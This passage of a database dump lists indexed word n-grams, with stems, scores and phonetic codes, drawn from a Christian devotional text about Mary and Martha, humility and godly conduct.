(278347, 'him out of', 'him out of', 0, 1, 1.3333, 'H531', 1, '*'),
(278348, 'him the lesson', 'him the lesson', 0, 1, 1.4667, 'H53425', 1, '*'),
(278349, 'him unhappy', 'him unhappy', 0, 1, 1.3667, 'H510', 1, '*'),
(278350, 'him unhappy because', 'him unhappy because', 0, 1, 1.6333, 'H512', 1, '*'),
(278351, 'him you must', 'him you must', 0, 1, 1.4, 'H523', 1, '*'),
(278352, 'himself more', 'himself more', 0, 1, 1.4, 'H524156', 1, '*'),
(278353, 'himself more highly', 'himself more highly', 0, 1, 1.6333, 'H52415624', 1, '*'),
(278354, 'his main', 'hi main', 0, 1, 1.2667, 'H250', 1, '*'),
(278355, 'his main reason', 'hi main reason', 0, 1, 1.5, 'H25625', 1, '*'),
(278356, 'his name as', 'hi name as', 0, 1, 1.3667, 'H252', 1, '*'),
(278357, 'his only', 'hi only', 0, 1, 1.2667, 'H254', 1, '*'),
(278358, 'his only begotten', 'hi only begotten', 0, 1, 1.5667, 'H2541235', 1, '*'),
(278359, 'his power', 'hi power', 0, 1, 1.3, 'H216', 1, '*'),
(278360, 'his power to', 'hi power to', 0, 1, 1.4, 'H2163', 1, '*'),
(278361, 'his way but', 'hi way but', 0, 1, 1.3667, 'H213', 1, '*'),
(278362, 'holy as', 'holi as', 0, 1, 1.2333, 'H420', 1, '*'),
(278363, 'holy as possible', 'holi as possible', 0, 1, 1.5333, 'H421214', 1, '*'),
(278364, 'hope the', 'hope the', 0, 1, 1.2667, 'H130', 1, '*'),
(278365, 'hope the funny', 'hope the funny', 0, 1, 1.4667, 'H1315', 1, '*'),
(278366, 'house and both', 'hous and both', 0, 1, 1.4667, 'H25313', 1, '*'),
(278367, 'how god', 'how god', 0, 1, 1.2333, 'H230', 2, '*'),
(278368, 'how god would', 'how god would', 0, 1, 1.4333, 'H2343', 1, '*'),
(278369, 'how much it', 'how much it', 0, 1, 1.3667, 'H523', 1, '*'),
(278370, 'how you act', 'how you act', 0, 1, 1.3667, 'H230', 1, '*'),
(278371, 'how you\'re', 'how you', 0, 1, 1.3333, 'H600', 1, '*'),
(278372, 'how you\'re dressed', 'how you dressed', 0, 1, 1.6, 'H63623', 1, '*'),
(278373, 'however that', 'howev that', 0, 1, 1.4, 'H163', 1, '*'),
(278374, 'however that this', 'howev that this', 0, 1, 1.5667, 'H1632', 1, '*'),
(278375, 'hypocrites', 'hypocrit', 0, 0, 0.6667, 'H12632', 1, '*'),
(278376, 'hypocrites god', 'hypocrit god', 0, 1, 1.4667, 'H126323', 1, '*'),
(278377, 'hypocrites god hates', 'hypocrit god hates', 0, 1, 1.6667, 'H1263232', 1, '*'),
(278378, 'i you', 'i you', 0, 1, 1.1667, 'I000', 1, '*'),
(278379, 'i you must', 'i you must', 0, 1, 1.3333, 'I523', 1, '*'),
(278380, 'i\'m aware', 'i aware', 0, 1, 1.3, 'I560', 1, '*'),
(278381, 'i\'m aware this', 'i aware this', 0, 1, 1.4667, 'I5632', 1, '*'),
(278382, 'ideal', 'ideal', 0, 0, 0.3333, 'I340', 1, '*'),
(278383, 'ideal lifestyle', 'ideal lifestyle', 0, 1, 1.5, 'I341234', 1, '*'),
(278384, 'ideal lifestyle for', 'ideal lifestyle for', 0, 1, 1.6333, 'I34123416', 1, '*'),
(278385, 'idle', 'idl', 0, 0, 0.2667, 'I340', 1, '*'),
(278386, 'idle talk', 'idl talk', 0, 1, 1.3, 'I34342', 1, '*'),
(278387, 'idle talk god', 'idl talk god', 0, 1, 1.4333, 'I343423', 1, '*'),
(278388, 'if mary', 'if mary', 0, 1, 1.2333, 'I156', 1, '*'),
(278389, 'if mary had', 'if mary had', 0, 1, 1.3667, 'I1563', 1, '*'),
(278390, 'if not', 'if not', 0, 1, 1.2, 'I153', 1, '*'),
(278391, 'if not you', 'if not you', 0, 1, 1.3333, 'I153', 1, '*'),
(278392, 'if you had', 'if you had', 0, 1, 1.3333, 'I130', 1, '*'),
(278393, 'if you\'re ever', 'if you ever', 0, 1, 1.4667, 'I1616', 1, '*'),
(278394, 'ignored either', 'ignor either', 0, 1, 1.4667, 'I25636', 1, '*'),
(278395, 'ignored either your', 'ignor either your', 0, 1, 1.6333, 'I25636', 1, '*'),
(278396, 'ii your', 'ii your', 0, 1, 1.2333, 'I600', 1, '*'),
(278397, 'ii your dressing', 'ii your dressing', 0, 1, 1.5333, 'I636252', 1, '*'),
(278398, 'iii', 'iii', 0, 0, 0.2, 'I000', 2, '*'),
(278399, 'iii you', 'iii you', 0, 1, 1.2333, 'I000', 1, '*'),
(278400, 'iii you must', 'iii you must', 0, 1, 1.4, 'I523', 1, '*'),
(278401, 'implies', 'impli', 0, 0, 0.4667, 'I5142', 1, '*'),
(278402, 'implies the', 'impli the', 0, 1, 1.3667, 'I51423', 1, '*'),
(278403, 'implies the following', 'impli the following', 0, 1, 1.7, 'I514231452', 1, '*'),
(278404, 'important as', 'import as', 0, 1, 1.4, 'I5163532', 1, '*'),
(278405, 'important as the', 'import as the', 0, 1, 1.5333, 'I51635323', 1, '*'),
(278406, 'important they', 'import they', 0, 1, 1.4667, 'I516353', 1, '*'),
(278407, 'important they were', 'import they were', 0, 1, 1.6333, 'I5163536', 1, '*'),
(278408, 'improve', 'improv', 0, 0, 0.4667, 'I5161', 1, '*'),
(278409, 'improve the', 'improv the', 0, 1, 1.3667, 'I51613', 1, '*'),
(278410, 'improve the situation', 'improv the situation', 0, 1, 1.7, 'I51613235', 1, '*'),
(278411, 'in a certain', 'in a certain', 0, 1, 1.4, 'I52635', 1, '*'),
(278412, 'in a situation', 'in a situation', 0, 1, 1.4667, 'I5235', 1, '*'),
(278413, 'in a tight', 'in a tight', 0, 1, 1.3333, 'I5323', 1, '*'),
(278414, 'in a way', 'in a way', 0, 1, 1.2667, 'I500', 1, '*'),
(278415, 'in becoming', 'in becoming', 0, 1, 1.3667, 'I51252', 1, '*'),
(278416, 'in becoming like', 'in becoming like', 0, 1, 1.5333, 'I5125242', 1, '*'),
(278417, 'in different', 'in different', 0, 1, 1.4, 'I531653', 1, '*'),
(278418, 'in different situations', 'in different situations', 0, 1, 1.7667, 'I5316532352', 1, '*'),
(278419, 'in front', 'in front', 0, 1, 1.2667, 'I51653', 2, '*'),
(278420, 'in front of', 'in front of', 0, 1, 1.3667, 'I516531', 2, '*'),
(278421, 'in glory and', 'in glory and', 0, 1, 1.4, 'I524653', 1, '*'),
(278422, 'in his power', 'in his power', 0, 1, 1.4, 'I5216', 1, '*'),
(278423, 'in how', 'in how', 0, 1, 1.2, 'I500', 1, '*'),
(278424, 'in how you\'re', 'in how you', 0, 1, 1.4333, 'I560', 1, '*'),
(278425, 'in idle', 'in idle', 0, 1, 1.2333, 'I534', 1, '*'),
(278426, 'in idle talk', 'in idle talk', 0, 1, 1.4, 'I534342', 1, '*'),
(278427, 'in james', 'in james', 0, 1, 1.2667, 'I5252', 1, '*'),
(278428, 'in james 4', 'in james 4', 0, 1, 1.3333, 'I5252', 1, '*'),
(278429, 'in love john', 'in love john', 0, 1, 1.4, 'I54125', 1, '*'),
(278430, 'in no', 'in no', 0, 1, 1.1667, 'I500', 1, '*'),
(278431, 'in no way', 'in no way', 0, 1, 1.3, 'I500', 1, '*'),
(278432, 'in person', 'in person', 0, 1, 1.3, 'I51625', 1, '*'),
(278433, 'in person that\'s', 'in person that', 0, 1, 1.5333, 'I5162532', 1, '*'),
(278434, 'in psalm', 'in psalm', 0, 1, 1.2667, 'I51245', 1, '*'),
(278435, 'in psalm 8', 'in psalm 8', 0, 1, 1.3333, 'I51245', 1, '*'),
(278436, 'in the above', 'in the above', 0, 1, 1.4, 'I531', 1, '*'),
(278437, 'in the manner', 'in the manner', 0, 1, 1.4333, 'I5356', 1, '*'),
(278438, 'in tongues your', 'in tongues your', 0, 1, 1.5, 'I53526', 1, '*'),
(278439, 'in vain', 'in vain', 0, 1, 1.2333, 'I515', 1, '*'),
(278440, 'in vain another', 'in vain another', 0, 1, 1.5, 'I51536', 1, '*'),
(278441, 'in which you', 'in which you', 0, 1, 1.4, 'I520', 1, '*'),
(278442, 'in you shouldn\'t', 'in you shouldn', 0, 1, 1.5333, 'I524353', 1, '*'),
(278443, 'in your authority', 'in your authority', 0, 1, 1.5667, 'I56363', 1, '*'),
(278444, 'in your mind', 'in your mind', 0, 1, 1.4, 'I5653', 1, '*'),
(278445, 'in your possession', 'in your possession', 0, 1, 1.6, 'I56125', 1, '*'),
(278446, 'inch', 'inch', 0, 0, 0.2667, 'I520', 1, '*'),
(278447, 'inch in', 'inch in', 0, 1, 1.2333, 'I525', 1, '*'),
(278448, 'inch in your', 'inch in your', 0, 1, 1.4, 'I5256', 1, '*'),
(278449, 'inferiority', 'inferior', 0, 0, 0.7333, 'I5163', 1, '*'),
(278450, 'inferiority i', 'inferior i', 0, 1, 1.4333, 'I5163', 1, '*'),
(278451, 'inferiority i want', 'inferior i want', 0, 1, 1.6, 'I516353', 1, '*'),
(278452, 'instead of complaining', 'instead of complaining', 0, 1, 1.7333, 'I5231251452', 1, '*'),
(278453, 'instead of realizing', 'instead of realizing', 0, 1, 1.6667, 'I523164252', 1, '*'),
(278454, 'into existence', 'into existence', 0, 1, 1.4667, 'I532352', 1, '*'),
(278455, 'into existence through', 'into existence through', 0, 1, 1.7333, 'I532352362', 1, '*'),
(278456, 'into pride', 'into pride', 0, 1, 1.3333, 'I53163', 1, '*'),
(278457, 'into pride because', 'into pride because', 0, 1, 1.6, 'I5316312', 1, '*'),
(278458, 'is clothed', 'is clothed', 0, 1, 1.3333, 'I243', 1, '*'),
(278459, 'is clothed in', 'is clothed in', 0, 1, 1.4333, 'I2435', 1, '*'),
(278460, 'is error to', 'is error to', 0, 1, 1.3667, 'I263', 1, '*'),
(278461, 'is god doesn\'t', 'is god doesn', 0, 1, 1.4667, 'I23253', 1, '*'),
(278462, 'is hope the', 'is hope the', 0, 1, 1.3667, 'I213', 1, '*'),
(278463, 'is in his', 'is in his', 0, 1, 1.3, 'I252', 1, '*'),
(278464, 'is love', 'is love', 0, 1, 1.2333, 'I241', 1, '*'),
(278465, 'is love and', 'is love and', 0, 1, 1.3667, 'I24153', 1, '*'),
(278466, 'is that if', 'is that if', 0, 1, 1.3333, 'I231', 1, '*'),
(278467, 'is that instead', 'is that instead', 0, 1, 1.5, 'I23523', 1, '*'),
(278468, 'is that this', 'is that this', 0, 1, 1.4, 'I232', 1, '*'),
(278469, 'is the point', 'is the point', 0, 1, 1.4, 'I23153', 1, '*'),
(278470, 'is the story', 'is the story', 0, 1, 1.4, 'I23236', 1, '*'),
(278471, 'is the toughest', 'is the toughest', 0, 1, 1.5, 'I2323', 1, '*'),
(278472, 'is to attend', 'is to attend', 0, 1, 1.4, 'I2353', 1, '*'),
(278473, 'is to begin', 'is to begin', 0, 1, 1.3667, 'I23125', 1, '*'),
(278474, 'is to draw', 'is to draw', 0, 1, 1.3333, 'I236', 1, '*'),
(278475, 'is to stand', 'is to stand', 0, 1, 1.3667, 'I232353', 1, '*'),
(278476, 'isn\'t', 'isn', 0, 0, 0.3333, 'I253', 1, '*'),
(278477, 'isn\'t your', 'isn your', 0, 1, 1.3333, 'I2536', 1, '*'),
(278478, 'isn\'t your primary', 'isn your primary', 0, 1, 1.6, 'I25361656', 1, '*'),
(278479, 'issue is', 'issu is', 0, 1, 1.2667, 'I200', 1, '*'),
(278480, 'issue is the', 'issu is the', 0, 1, 1.4, 'I230', 1, '*'),
(278481, 'it he', 'it he', 0, 1, 1.1667, 'I300', 1, '*'),
(278482, 'it he has', 'it he has', 0, 1, 1.3, 'I320', 1, '*'),
(278483, 'it pays', 'it pays', 0, 1, 1.2333, 'I312', 1, '*'),
(278484, 'it pays to', 'it pays to', 0, 1, 1.3333, 'I3123', 1, '*'),
(278485, 'it really', 'it really', 0, 1, 1.3, 'I364', 1, '*'),
(278486, 'it really takes', 'it really takes', 0, 1, 1.5, 'I36432', 1, '*'),
(278487, 'it robs', 'it robs', 0, 1, 1.2333, 'I3612', 1, '*'),
(278488, 'it robs you', 'it robs you', 0, 1, 1.3667, 'I3612', 1, '*'),
(278489, 'it says', 'it says', 0, 1, 1.2333, 'I320', 1, '*'),
(278490, 'it says don\'t', 'it says don', 0, 1, 1.4333, 'I32353', 1, '*'),
(278491, 'it\'s pretty', 'it pretty', 0, 1, 1.3667, 'I32163', 1, '*'),
(278492, 'it\'s pretty obvious', 'it pretty obvious', 0, 1, 1.6333, 'I3216312', 1, '*'),
(278493, 'item 24', 'item 24', 0, 1, 1.2333, 'I350', 1, '*'),
(278494, 'item 24 correct', 'item 24 correct', 0, 1, 1.5, 'I352623', 1, '*'),
(278495, 'james 4', 'jame 4', 0, 1, 1.2333, 'J520', 1, '*'),
(278496, 'james 4 7', 'jame 4 7', 0, 1, 1.3, 'J520', 1, '*'),
(278497, 'jesus christ martha', 'jesu christ martha', 0, 1, 1.6333, 'J623563', 1, '*'),
(278498, 'jesus in the', 'jesu in the', 0, 1, 1.4, 'J530', 1, '*'),
(278499, 'jesus jesus', 'jesu jesus', 0, 1, 1.3667, 'J000', 1, '*'),
(278500, 'jesus jesus would', 'jesu jesus would', 0, 1, 1.5667, 'J430', 1, '*'),
(278501, 'jesus made', 'jesu made', 0, 1, 1.3333, 'J530', 1, '*'),
(278502, 'jesus made her', 'jesu made her', 0, 1, 1.4667, 'J536', 1, '*'),
(278503, 'jesus rebuked', 'jesu rebuked', 0, 1, 1.4333, 'J6123', 1, '*'),
(278504, 'jesus rebuked the', 'jesu rebuked the', 0, 1, 1.5667, 'J6123', 1, '*'),
(278505, 'jesus that mary', 'jesu that mary', 0, 1, 1.5, 'J356', 1, '*'),
(278506, 'jesus would have', 'jesu would have', 0, 1, 1.5333, 'J431', 1, '*'),
(278507, 'john 15 12', 'john 15 12', 0, 1, 1.3333, 'J500', 1, '*'),
(278508, 'k2 item 24', 'k2 item 24', 0, 1, 1.3333, 'K350', 1, '*'),
(278509, 'keep bothering', 'keep bothering', 0, 1, 1.4667, 'K13652', 1, '*'),
(278510, 'keep bothering you', 'keep bothering you', 0, 1, 1.6, 'K13652', 1, '*'),
(278511, 'keep the devil', 'keep the devil', 0, 1, 1.4667, 'K1314', 1, '*'),
(278512, 'kind of selfish', 'kind of selfish', 0, 1, 1.5, 'K5312412', 1, '*'),
(278513, 'know is', 'know is', 0, 1, 1.2333, 'K520', 1, '*'),
(278514, 'know is that', 'know is that', 0, 1, 1.4, 'K523', 1, '*'),
(278515, 'know will', 'know will', 0, 1, 1.3, 'K540', 2, '*'),
(278516, 'know will make', 'know will make', 0, 1, 1.4667, 'K5452', 1, '*'),
(278517, 'knows it', 'know it', 0, 1, 1.2667, 'K523', 1, '*'),
(278518, 'knows it he', 'know it he', 0, 1, 1.3667, 'K523', 1, '*'),
(278519, 'knows the danger', 'know the danger', 0, 1, 1.5333, 'K523526', 1, '*'),
(278520, 'lastly if', 'lastli if', 0, 1, 1.3, 'L2341', 1, '*'),
(278521, 'lastly if you', 'lastli if you', 0, 1, 1.4333, 'L2341', 1, '*'),
(278522, 'leads to lust', 'lead to lust', 0, 1, 1.4333, 'L323423', 1, '*'),
(278523, 'legal', 'legal', 0, 0, 0.3333, 'L240', 1, '*'),
(278524, 'legal foothold', 'legal foothold', 0, 1, 1.4667, 'L241343', 1, '*'),
(278525, 'legal foothold in', 'legal foothold in', 0, 1, 1.5667, 'L2413435', 1, '*'),
(278526, 'lesson', 'lesson', 0, 0, 0.4, 'L250', 1, '*'),
(278527, 'lesson behind', 'lesson behind', 0, 1, 1.4333, 'L25153', 1, '*'),
(278528, 'lesson behind this', 'lesson behind this', 0, 1, 1.6, 'L251532', 1, '*'),
(278529, 'let us take', 'let us take', 0, 1, 1.3667, 'L3232', 1, '*'),
(278530, 'life and personal', 'life and personal', 0, 1, 1.5667, 'L15316254', 1, '*'),
(278531, 'life as a', 'life as a', 0, 1, 1.3, 'L120', 1, '*'),
(278532, 'life avoid', 'life avoid', 0, 1, 1.3333, 'L130', 1, '*'),
(278533, 'life avoid the', 'life avoid the', 0, 1, 1.4667, 'L130', 1, '*'),
(278534, 'life isn\'t', 'life isn', 0, 1, 1.3333, 'L1253', 1, '*'),
(278535, 'life isn\'t your', 'life isn your', 0, 1, 1.5, 'L12536', 1, '*'),
(278536, 'life so', 'life so', 0, 1, 1.2333, 'L120', 1, '*'),
(278537, 'life so watch', 'life so watch', 0, 1, 1.4333, 'L1232', 1, '*'),
(278538, 'life that gives', 'life that gives', 0, 1, 1.5, 'L13212', 1, '*'),
(278539, 'life therefore', 'life therefore', 0, 1, 1.4667, 'L13616', 1, '*'),
(278540, 'life therefore choose', 'life therefore choose', 0, 1, 1.7, 'L136162', 1, '*'),
(278541, 'life to keep', 'life to keep', 0, 1, 1.4, 'L1321', 1, '*'),
(278542, 'life what it', 'life what it', 0, 1, 1.4, 'L130', 1, '*'),
(278543, 'lifestyle as', 'lifestyl as', 0, 1, 1.4, 'L12342', 1, '*'),
(278544, 'lifestyle as a', 'lifestyl as a', 0, 1, 1.4667, 'L12342', 1, '*'),
(278545, 'lifestyle for', 'lifestyl for', 0, 1, 1.4333, 'L123416', 1, '*'),
(278546, 'lifestyle for a', 'lifestyl for a', 0, 1, 1.5, 'L123416', 1, '*'),
(278547, 'lifestyle of', 'lifestyl of', 0, 1, 1.4, 'L12341', 1, '*'),
(278548, 'lifestyle of a', 'lifestyl of a', 0, 1, 1.4667, 'L12341', 1, '*'),
(278549, 'lifestyle what', 'lifestyl what', 0, 1, 1.4667, 'L12343', 1, '*'),
(278550, 'lifestyle what you', 'lifestyl what you', 0, 1, 1.6, 'L12343', 1, '*'),
(278551, 'light and you', 'light and you', 0, 1, 1.4333, 'L2353', 1, '*'),
(278552, 'like a daunting', 'like a daunting', 0, 1, 1.5, 'L235352', 1, '*'),
(278553, 'like god', 'like god', 0, 1, 1.2667, 'L230', 1, '*'),
(278554, 'like god acting', 'like god acting', 0, 1, 1.5, 'L232352', 1, '*'),
(278555, 'like god i\'m', 'like god i', 0, 1, 1.4, 'L235', 1, '*'),
(278556, 'like god is', 'like god is', 0, 1, 1.3667, 'L232', 1, '*'),
(278557, 'like god matthew', 'like god matthew', 0, 1, 1.5333, 'L2353', 1, '*'),
(278558, 'like god means', 'like god means', 0, 1, 1.4667, 'L2352', 1, '*'),
(278559, 'like god poses', 'like god poses', 0, 1, 1.4667, 'L2312', 1, '*'),
(278560, 'like god proverbs', 'like god proverbs', 0, 1, 1.5667, 'L23161612', 1, '*'),
(278561, 'like god the', 'like god the', 0, 1, 1.4, 'L230', 1, '*'),
(278562, 'like god this', 'like god this', 0, 1, 1.4333, 'L232', 1, '*'),
(278563, 'like god until', 'like god until', 0, 1, 1.4667, 'L23534', 1, '*'),
(278564, 'like him', 'like him', 0, 1, 1.2667, 'L250', 1, '*'),
(278565, 'like him as', 'like him as', 0, 1, 1.3667, 'L252', 1, '*'),
(278566, 'like martha', 'like martha', 0, 1, 1.3667, 'L2563', 1, '*'),
(278567, 'like martha cooking', 'like martha cooking', 0, 1, 1.6333, 'L2563252', 1, '*'),
(278568, 'lingo', 'lingo', 0, 0, 0.3333, 'L520', 1, '*'),
(278569, 'lingo must', 'lingo must', 0, 1, 1.3333, 'L52523', 1, '*'),
(278570, 'lingo must be', 'lingo must be', 0, 1, 1.4333, 'L525231', 1, '*'),
(278571, 'listening to him', 'listen to him', 0, 1, 1.5333, 'L235235', 1, '*'),
(278572, 'live your', 'live your', 0, 1, 1.3, 'L160', 1, '*'),
(278573, 'live your life', 'live your life', 0, 1, 1.4667, 'L1641', 1, '*'),
(278574, 'look as', 'look as', 0, 1, 1.2333, 'L200', 1, '*'),
(278575, 'look as holy', 'look as holy', 0, 1, 1.4, 'L240', 1, '*'),
(278576, 'look closely', 'look closely', 0, 1, 1.4, 'L2424', 1, '*'),
(278577, 'look closely at', 'look closely at', 0, 1, 1.5, 'L24243', 1, '*'),
(278578, 'look rough', 'look rough', 0, 1, 1.3333, 'L262', 1, '*'),
(278579, 'look rough unkempt', 'look rough unkempt', 0, 1, 1.6, 'L26252513', 1, '*'),
(278580, 'looked at in', 'look at in', 0, 1, 1.4, 'L235', 1, '*'),
(278581, 'lord jesus christ', 'lord jesus christ', 0, 1, 1.5667, 'L632623', 2, '*'),
(278582, 'lot of them', 'lot of them', 0, 1, 1.3667, 'L3135', 1, '*'),
(278583, 'lot of work', 'lot of work', 0, 1, 1.3667, 'L3162', 1, '*'),
(278584, 'love and', 'love and', 0, 1, 1.2667, 'L153', 1, '*'),
(278585, 'love and as', 'love and as', 0, 1, 1.3667, 'L1532', 1, '*'),
(278586, 'love and compassion', 'love and compassion', 0, 1, 1.6333, 'L15325125', 1, '*'),
(278587, 'love and respect', 'love and respect', 0, 1, 1.5333, 'L15362123', 1, '*'),
(278588, 'love john', 'love john', 0, 1, 1.3, 'L125', 1, '*'),
(278589, 'love john 15', 'love john 15', 0, 1, 1.4, 'L125', 1, '*'),
(278590, 'love that leads', 'love that leads', 0, 1, 1.5, 'L13432', 1, '*'),
(278591, 'love to', 'love to', 0, 1, 1.2333, 'L130', 1, '*'),
(278592, 'love to the', 'love to the', 0, 1, 1.3667, 'L130', 1, '*'),
(278593, 'luke 10', 'luke 10', 0, 1, 1.2333, 'L200', 1, '*'),
(278594, 'luke 10 40-42', 'luke 10 40-42', 0, 1, 1.4333, 'L200', 1, '*'),
(278595, 'lust', 'lust', 0, 0, 0.2667, 'L230', 1, '*'),
(278596, 'lust but', 'lust but', 0, 1, 1.2667, 'L2313', 1, '*'),
(278597, 'lust but rather', 'lust but rather', 0, 1, 1.5, 'L2313636', 1, '*'),
(278598, 'lustful', 'lust', 0, 0, 0.4667, 'L2314', 1, '*'),
(278599, 'lustful thoughts', 'lust thoughts', 0, 1, 1.5333, 'L23143232', 1, '*'),
(278600, 'lustful thoughts fortunately', 'lust thoughts fortunately', 0, 1, 1.9333, 'L23143232163534', 1, '*'),
(278601, 'made her', 'made her', 0, 1, 1.2667, 'M360', 1, '*'),
(278602, 'made her realize', 'made her realize', 0, 1, 1.5333, 'M3642', 1, '*'),
(278603, 'made us', 'made us', 0, 1, 1.2333, 'M320', 1, '*'),
(278604, 'made us special', 'made us special', 0, 1, 1.5, 'M32124', 1, '*'),
(278605, 'made you special', 'made you special', 0, 1, 1.5333, 'M32124', 1, '*'),
(278606, 'main', 'main', 0, 0, 0.2667, 'M000', 1, '*'),
(278607, 'main reason', 'main reason', 0, 1, 1.3667, 'M625', 1, '*'),
(278608, 'main reason was', 'main reason was', 0, 1, 1.5, 'M6252', 1, '*'),
(278609, 'main thing', 'main thing', 0, 1, 1.3333, 'M352', 1, '*'),
(278610, 'main thing which', 'main thing which', 0, 1, 1.5333, 'M352', 1, '*'),
(278611, 'make men', 'make men', 0, 1, 1.2667, 'M250', 1, '*'),
(278612, 'make men think', 'make men think', 0, 1, 1.4667, 'M25352', 1, '*'),
(278613, 'making him', 'make him', 0, 1, 1.3333, 'M2525', 1, '*'),
(278614, 'making him unhappy', 'make him unhappy', 0, 1, 1.6, 'M25251', 1, '*'),
(278615, 'man as', 'man as', 0, 1, 1.2, 'M200', 1, '*'),
(278616, 'man as seen', 'man as seen', 0, 1, 1.3667, 'M250', 1, '*'),
(278617, 'man his main', 'man his main', 0, 1, 1.4, 'M250', 1, '*'),
(278618, 'man in psalm', 'man in psalm', 0, 1, 1.4, 'M1245', 1, '*'),
(278619, 'man you can\'t', 'man you can', 0, 1, 1.4333, 'M253', 1, '*'),
(278620, 'manner consistent', 'manner consistent', 0, 1, 1.5667, 'M6252353', 1, '*'),
(278621, 'manner consistent with', 'manner consistent with', 0, 1, 1.7333, 'M6252353', 1, '*'),
(278622, 'manner god', 'manner god', 0, 1, 1.3333, 'M623', 1, '*'),
(278623, 'manner god would', 'manner god would', 0, 1, 1.5333, 'M62343', 1, '*'),
(278624, 'manner of', 'manner of', 0, 1, 1.3, 'M610', 1, '*'),
(278625, 'manner of speech', 'manner of speech', 0, 1, 1.5333, 'M61212', 1, '*'),
(278626, 'many times in', 'mani times in', 0, 1, 1.4333, 'M3525', 1, '*'),
(278627, 'martha', 'martha', 0, 0, 0.4, 'M630', 1, '*'),
(278628, 'martha cooking', 'martha cooking', 0, 1, 1.4667, 'M63252', 1, '*'),
(278629, 'martha cooking and', 'martha cooking and', 0, 1, 1.6, 'M6325253', 1, '*'),
(278630, 'martha luke', 'martha luke', 0, 1, 1.3667, 'M6342', 1, '*'),
(278631, 'martha luke 10', 'martha luke 10', 0, 1, 1.4667, 'M6342', 1, '*'),
(278632, 'martha represents', 'martha represents', 0, 1, 1.5667, 'M636162532', 1, '*'),
(278633, 'martha represents the', 'martha represents the', 0, 1, 1.7, 'M6361625323', 1, '*'),
(278634, 'martha was', 'martha was', 0, 1, 1.3333, 'M632', 1, '*'),
(278635, 'martha was complaining', 'martha was complaining', 0, 1, 1.7333, 'M63251452', 1, '*'),
(278636, 'martha\'s', 'martha', 0, 0, 0.5333, 'M632', 1, '*'),
(278637, 'martha\'s house', 'martha house', 0, 1, 1.4667, 'M632', 1, '*'),
(278638, 'martha\'s house and', 'martha house and', 0, 1, 1.6, 'M63253', 1, '*'),
(278639, 'mary and', 'mari and', 0, 1, 1.2667, 'M653', 1, '*'),
(278640, 'mary and martha', 'mari and martha', 0, 1, 1.5, 'M653563', 1, '*'),
(278641, 'mary and martha\'s', 'mari and martha', 0, 1, 1.5667, 'M6535632', 1, '*'),
(278642, 'mary had', 'mari had', 0, 1, 1.2667, 'M630', 1, '*'),
(278643, 'mary had been', 'mari had been', 0, 1, 1.4333, 'M6315', 1, '*'),
(278644, 'mary took', 'mari took', 0, 1, 1.3, 'M632', 1, '*'),
(278645, 'mary took the', 'mari took the', 0, 1, 1.4333, 'M6323', 1, '*'),
(278646, 'mary wasn\'t', 'mari wasn', 0, 1, 1.3667, 'M6253', 1, '*'),
(278647, 'mary wasn\'t helping', 'mari wasn helping', 0, 1, 1.6333, 'M62534152', 1, '*'),
(278648, 'master speak', 'master speak', 0, 1, 1.4, 'M236212', 1, '*'),
(278649, 'master speak to', 'master speak to', 0, 1, 1.5, 'M2362123', 1, '*'),
(278650, 'matters when', 'matter when', 0, 1, 1.4, 'M3625', 1, '*'),
(278651, 'matters when it', 'matter when it', 0, 1, 1.5, 'M36253', 1, '*'),
(278652, 'matthew 12', 'matthew 12', 0, 1, 1.3333, 'M300', 1, '*'),
(278653, 'matthew 12 36-37', 'matthew 12 36-37', 0, 1, 1.5333, 'M300', 1, '*'),
(278654, 'matthew 15', 'matthew 15', 0, 1, 1.3333, 'M300', 1, '*'),
(278655, 'matthew 15 7-9', 'matthew 15 7-9', 0, 1, 1.4667, 'M300', 1, '*'),
(278656, 'means to act', 'mean to act', 0, 1, 1.4, 'M2323', 1, '*'),
(278657, 'means to be', 'mean to be', 0, 1, 1.3667, 'M231', 1, '*'),
(278658, 'means to behave', 'mean to behave', 0, 1, 1.5, 'M231', 1, '*'),
(278659, 'means we', 'mean we', 0, 1, 1.2667, 'M200', 1, '*'),
(278660, 'means we are', 'mean we are', 0, 1, 1.4, 'M260', 1, '*'),
(278661, 'means you carry', 'mean you carry', 0, 1, 1.5, 'M260', 1, '*'),
(278662, 'men also', 'men also', 0, 1, 1.2667, 'M420', 1, '*'),
(278663, 'men also as', 'men also as', 0, 1, 1.3667, 'M420', 1, '*'),
(278664, 'men b', 'men b', 0, 1, 1.1667, 'M100', 1, '*'),
(278665, 'men b talk', 'men b talk', 0, 1, 1.3333, 'M1342', 1, '*'),
(278666, 'men think', 'men think', 0, 1, 1.3, 'M352', 1, '*'),
(278667, 'men think of', 'men think of', 0, 1, 1.4, 'M3521', 1, '*'),
(278668, 'mind or', 'mind or', 0, 1, 1.2333, 'M360', 1, '*'),
(278669, 'mind or your', 'mind or your', 0, 1, 1.4, 'M360', 1, '*'),
(278670, 'missed the glorious', 'miss the glorious', 0, 1, 1.6333, 'M232462', 1, '*'),
(278671, 'mistakenly', 'mistakenli', 0, 0, 0.6667, 'M23254', 1, '*'),
(278672, 'mistakenly step', 'mistakenli step', 0, 1, 1.5, 'M23254231', 1, '*'),
(278673, 'mistakenly step into', 'mistakenli step into', 0, 1, 1.6667, 'M2325423153', 1, '*'),
(278674, 'mixtures part 3', 'mixtur part 3', 0, 1, 1.5, 'M2362163', 1, '*'),
(278675, 'moral rules', 'moral rules', 0, 1, 1.3667, 'M64642', 1, '*'),
(278676, 'moral rules and', 'moral rules and', 0, 1, 1.5, 'M6464253', 1, '*'),
(278677, 'more highly', 'more highly', 0, 1, 1.3667, 'M624', 1, '*'),
(278678, 'more highly than', 'more highly than', 0, 1, 1.5333, 'M62435', 1, '*'),
(278679, 'more thanjust', 'more thanjust', 0, 1, 1.4333, 'M63523', 1, '*'),
(278680, 'more thanjust obeying', 'more thanjust obeying', 0, 1, 1.7, 'M63523152', 1, '*'),
(278681, 'mouth what', 'mouth what', 0, 1, 1.3333, 'M300', 1, '*'),
(278682, 'mouth what you', 'mouth what you', 0, 1, 1.4667, 'M300', 1, '*'),
(278683, 'much it', 'much it', 0, 1, 1.2333, 'M230', 1, '*'),
(278684, 'much it pays', 'much it pays', 0, 1, 1.4, 'M2312', 1, '*'),
(278685, 'much more thanjust', 'much more thanjust', 0, 1, 1.6, 'M2563523', 1, '*'),
(278686, 'must also', 'must also', 0, 1, 1.3, 'M2342', 1, '*'),
(278687, 'must also showcase', 'must also showcase', 0, 1, 1.6, 'M2342', 1, '*'),
(278688, 'must always', 'must always', 0, 1, 1.3667, 'M2342', 2, '*'),
(278689, 'must always represent', 'must always represent', 0, 1, 1.7, 'M2342616253', 1, '*'),
(278690, 'must always treat', 'must always treat', 0, 1, 1.5667, 'M2342363', 1, '*'),
